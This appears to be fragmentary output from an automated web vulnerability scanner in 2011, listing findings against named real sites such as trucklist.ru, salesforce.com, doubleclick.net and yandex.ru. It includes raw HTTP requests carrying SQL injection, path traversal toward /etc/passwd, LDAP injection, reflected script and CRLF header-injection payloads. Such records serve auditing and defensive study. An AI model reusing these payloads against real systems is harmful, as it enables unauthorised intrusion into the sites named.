HTTP/1.1 404 Not Found Server: nginx/0.7.64 Date: Mon, 25 Apr 2011 14:46:46 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.2.6 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 25 Apr 2011 14:32:09 GMT Content-Length: 6644 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>TRUCKLIST.RU - ............ 404</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <lin ...[SNIP]... </b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.trucklist.ru |
Path: | /webroot/delivery/js |
GET /webroot/delivery/js Host: www.trucklist.ru Proxy-Connection: keep-alive Referer: http://www.trucklist.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=94671815d7 |
HTTP/1.1 404 Not Found Server: nginx/0.7.64 Date: Mon, 25 Apr 2011 14:53:28 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.2.11 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 25 Apr 2011 14:53:28 GMT Content-Length: 6630 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>TRUCKLIST.RU - ............ 404</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <lin ...[SNIP]... </b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b> ...[SNIP]... |
GET /webroot/delivery/js Host: www.trucklist.ru Proxy-Connection: keep-alive Referer: http://www.trucklist.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=94671815d7 |
HTTP/1.1 404 Not Found Server: nginx/0.7.64 Date: Mon, 25 Apr 2011 14:53:31 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.2.6 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 25 Apr 2011 14:38:54 GMT Content-Length: 4387 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>TRUCKLIST.RU - ............ 404</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <lin ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.trucklist.ru |
Path: | /webroot/delivery/js |
GET /webroot/delivery/js Host: www.trucklist.ru Proxy-Connection: keep-alive Referer: http://www.trucklist.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=94671815d7 |
HTTP/1.1 404 Not Found Server: nginx/0.7.64 Date: Mon, 25 Apr 2011 14:46:36 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.2.11 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 25 Apr 2011 14:46:36 GMT Content-Length: 6640 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>TRUCKLIST.RU - ............ 404</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <lin ...[SNIP]... </b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b> ...[SNIP]... |
GET /webroot/delivery/js Host: www.trucklist.ru Proxy-Connection: keep-alive Referer: http://www.trucklist.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=94671815d7 |
HTTP/1.1 404 Not Found Server: nginx/0.7.64 Date: Mon, 25 Apr 2011 14:46:38 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.2.6 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 25 Apr 2011 14:32:02 GMT Content-Length: 4387 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>TRUCKLIST.RU - ............ 404</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <lin ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.trucklist.ru |
Path: | /webroot/delivery/js |
GET /webroot/delivery/js Host: www.trucklist.ru Proxy-Connection: keep-alive Referer: http://www.trucklist.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=94671815d7 |
HTTP/1.1 404 Not Found Server: nginx/0.7.64 Date: Mon, 25 Apr 2011 14:54:16 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.2.11 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 25 Apr 2011 14:54:16 GMT Content-Length: 6636 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>TRUCKLIST.RU - ............ 404</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <lin ...[SNIP]... </b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b> ...[SNIP]... |
GET /webroot/delivery/js Host: www.trucklist.ru Proxy-Connection: keep-alive Referer: http://www.trucklist.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=94671815d7 |
HTTP/1.1 404 Not Found Server: nginx/0.7.64 Date: Mon, 25 Apr 2011 14:54:25 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.2.6 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 25 Apr 2011 14:39:49 GMT Content-Length: 4387 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>TRUCKLIST.RU - ............ 404</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <lin ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.trucklist.ru |
Path: | /webroot/delivery/js |
GET /webroot/delivery/js Host: www.trucklist.ru Proxy-Connection: keep-alive Referer: http://www.trucklist.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=94671815d7 |
HTTP/1.1 404 Not Found Server: nginx/0.7.64 Date: Mon, 25 Apr 2011 14:51:11 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.2.6 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 25 Apr 2011 14:36:34 GMT Content-Length: 6632 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>TRUCKLIST.RU - ............ 404</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <lin ...[SNIP]... </b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b> ...[SNIP]... |
GET /webroot/delivery/js Host: www.trucklist.ru Proxy-Connection: keep-alive Referer: http://www.trucklist.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=94671815d7 |
HTTP/1.1 404 Not Found Server: nginx/0.7.64 Date: Mon, 25 Apr 2011 14:51:13 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.2.6 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 25 Apr 2011 14:36:36 GMT Content-Length: 4387 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>TRUCKLIST.RU - ............ 404</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <lin ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.trucklist.ru |
Path: | /webroot/delivery/js |
GET /webroot/delivery/js Host: www.trucklist.ru Proxy-Connection: keep-alive Referer: http://www.trucklist.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=94671815d7 |
HTTP/1.1 404 Not Found Server: nginx/0.7.64 Date: Mon, 25 Apr 2011 14:51:14 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.2.11 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 25 Apr 2011 14:51:14 GMT Content-Length: 6670 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>TRUCKLIST.RU - ............ 404</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <lin ...[SNIP]... </b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.trucklist.ru |
Path: | /webroot/delivery/js |
GET /webroot/delivery/js Host: www.trucklist.ru Proxy-Connection: keep-alive Referer: http://www.trucklist.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=94671815d7 |
HTTP/1.1 404 Not Found Server: nginx/0.7.64 Date: Mon, 25 Apr 2011 14:46:15 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.2.6 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 25 Apr 2011 14:31:38 GMT Content-Length: 6660 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>TRUCKLIST.RU - ............ 404</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <lin ...[SNIP]... </b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.trucklist.ru |
Path: | /webroot/delivery/js |
GET /webroot/delivery/js Host: www.trucklist.ru Proxy-Connection: keep-alive Referer: http://www.trucklist.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=94671815d7 |
HTTP/1.1 404 Not Found Server: nginx/0.7.64 Date: Mon, 25 Apr 2011 14:46:21 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.2.6 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 25 Apr 2011 14:31:44 GMT Content-Length: 6668 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>TRUCKLIST.RU - ............ 404</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <lin ...[SNIP]... </b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.trucklist.ru |
Path: | /webroot/delivery/js |
GET /webroot/delivery/js Host: www.trucklist.ru Proxy-Connection: keep-alive Referer: http://www.trucklist.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=94671815d7 |
HTTP/1.1 404 Not Found Server: nginx/0.7.64 Date: Mon, 25 Apr 2011 14:46:40 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.2.6 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 25 Apr 2011 14:32:03 GMT Content-Length: 6664 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>TRUCKLIST.RU - ............ 404</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <lin ...[SNIP]... </b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | https://www.salesforce |
Path: | /servlet/servlet |
POST /servlet../../../../../../ Host: www.salesforce.com Connection: keep-alive Referer: http://www.reputatio Cache-Control: max-age=0 Origin: http://www.reputatio User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: mbox=check#true Content-Length: 198 oid=00DC0000000Piy3 |
HTTP/1.1 404 Not Found Server: SFDC Cache-Control: max-age=0 Cache-Control: must-revalidate Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Length: 23502 Date: Mon, 25 Apr 2011 16:08:38 GMT <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" co ...[SNIP]... -sjl.ops.sfdc.net www.salesforce.com /cms/system/handler Server error 404 Not Found The requested resource "/cms/etc/passwd siteRoot:/sites/sfdc --> ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://ar.voicefive.com |
Path: | /bmx3/broker.pli |
GET /bmx3/broker.pli?pid=2a0e35b7bd3690da)(sn=*&PRAd=253732017&AR_C Host: ar.voicefive.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ar_p91300630=exp=1 |
HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Apr 2011 14:36:04 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_2a0e35b7bd3690da)& Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept Content-Length: 9 /*error*/ |
GET /bmx3/broker.pli?pid=2a0e35b7bd3690da)!(sn=*&PRAd=253732017&AR_C Host: ar.voicefive.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ar_p91300630=exp=1 |
HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Apr 2011 14:36:04 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_2a0e35b7bd3690da)! Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept Content-Length: 9 /*error*/ |
Severity: | High |
Confidence: | Certain |
Host: | http://learn.shavlik.com |
Path: | /shavlik/index.cfm |
GET /shavlik/index.cfm?m=521 Host: learn.shavlik.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631 |
GET /shavlik/index.cfm?m=521 Host: learn.shavlik.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631 |
HTTP/1.1 200 OK Connection: close Date: Mon, 25 Apr 2011 12:47:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8 ...[SNIP]... <!-- 0744fd--><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/lj.homepage |
GET /69b58%0d%0afb4aa952766/lj.homepage/loggedout;a Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.livejournal User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/69b58 fb4aa952766/lj.homepage/loggedout;a Date: Mon, 25 Apr 2011 14:33:59 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /dot.gif |
GET /dot.gifd65f3%0d%0ab88a010799e?1303741320269 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://games.mochiads.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net b88a010799e: Date: Mon, 25 Apr 2011 14:56:32 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://bs.yandex.ru |
Path: | /count/108pZT9La4K40 |
GET /count/108pZT9La4K40 Host: bs.yandex.ru Proxy-Connection: keep-alive Referer: http://mail.ru/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: yandexuid=1981869761 |
HTTP/1.1 302 Found Date: Mon, 25 Apr 2011 14:34:43 GMT Server: Phantom/0.0.0 P3P: CP="NOI DEVa TAIa OUR BUS UNI STA" Last-Modified: Mon, 25 Apr 2011 14:34:43 GMT Expires: Mon, 25 Apr 2011 14:34:43 GMT Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0 Pragma: no-cache Location: http://bs.mail.ruc396e c1277611b7a/count/108pZT9La4K40 c1277611b7a,19818697 Content-Length: 0 |
Severity: | High |
Confidence: | Certain |
Host: | http://click-here-to |
Path: | /players/iaPlay13.swf |
GET /baa49%0d%0ab09bbe6f887/iaPlay13.swf?x Host: click-here-to-listen.com Proxy-Connection: keep-alive Referer: http://playaudiomessage Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 302 Moved Location: http://sfo.click-here-to b09bbe6f887/iaPlay13.swf Connection: close |
Severity: | High |
Confidence: | Certain |
Host: | http://click-here-to |
Path: | /players/iaPlay13.swf |
GET /players/fdaa7%0d%0aa82a400e71b?x=2108535237WCZSIT HTTP/1.1 Host: click-here-to-listen.com Proxy-Connection: keep-alive Referer: http://playaudiomessage Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 302 Moved Location: http://sfo.click-here-to a82a400e71b Connection: close |
Severity: | High |
Confidence: | Certain |
Host: | http://pretty.ru |
Path: | /favicon.ico |
GET /9656f%0d%0a539e8d0607b HTTP/1.1 Host: pretty.ru Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: domhit=1; randomhit=177203261; LP_CH_C=love_cookies; __utmz=1.1303741245.1.1 |
HTTP/1.1 302 Found Server: nginx Date: Mon, 25 Apr 2011 14:56:13 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Location: /a-main/param-notfound 539e8d0607b: Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Mon, 25 Apr 2011 14:56:13 GMT Content-Length: 100 <!-- 0.019777 --><!--hostip=kenobi--> <!--revision=2011-04-22-- <!--revision_tmpl=2011-04 |
Severity: | High |
Confidence: | Certain |
Host: | http://www.instantengage |
Path: | /operator_status.php |
GET /operator_status.php Host: www.instantengage.com Proxy-Connection: keep-alive Referer: http://www.integrity User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 302 Found Date: Mon, 25 Apr 2011 15:46:07 GMT Server: Apache/2.0.50 (Fedora) X-Powered-By: PHP/4.3.8 Cache-Control: no-cache, must-revalidate Expires: Mon, 26 Jul 1997 05:00:00 GMT location: 1225d 6b625487c7a P3P: CP="OTI DSP COR PSAa OUR IND COM NAV STA" Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 |
Severity: | High |
Confidence: | Certain |
Host: | https://www.salesforce |
Path: | /favicon.ico |
GET /5719e%0d%0aad6007fb0ac HTTP/1.1 Host: www.salesforce.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: mbox=check#true |
HTTP/1.1 301 Moved Permanently Server: SFDC Location: /5719e ad6007fb0ac/ Date: Mon, 25 Apr 2011 16:09:37 GMT Content-Length: 77 The URL has moved to <a href="/5719e ad6007fb0ac/">/5719e ad6007fb0ac/</a> |
Severity: | High |
Confidence: | Certain |
Host: | https://www.salesforce |
Path: | /servlet/servlet |
POST /servlet/5adda%0d%0a7266c97a38c?encoding=UTF-8 HTTP/1.1 Host: www.salesforce.com Connection: keep-alive Referer: http://www.reputatio Cache-Control: max-age=0 Origin: http://www.reputatio User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: mbox=check#true Content-Length: 198 oid=00DC0000000Piy3 |
HTTP/1.1 301 Moved Permanently Server: SFDC Location: /servlet/5adda 7266c97a38c/?encoding=UTF-8 Date: Mon, 25 Apr 2011 16:08:43 GMT Content-Length: 123 The URL has moved to <a href="/servlet/5adda 7266c97a38c/?encoding=UTF 7266c97a38c/?encoding=UTF |
Severity: | High |
Confidence: | Certain |
Host: | http://ads.adxpose.com |
Path: | /ads/ads.js |
GET /ads/ads.js?uid Host: ads.adxpose.com Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: evlu=8046e9fe-2ba6-4040 |
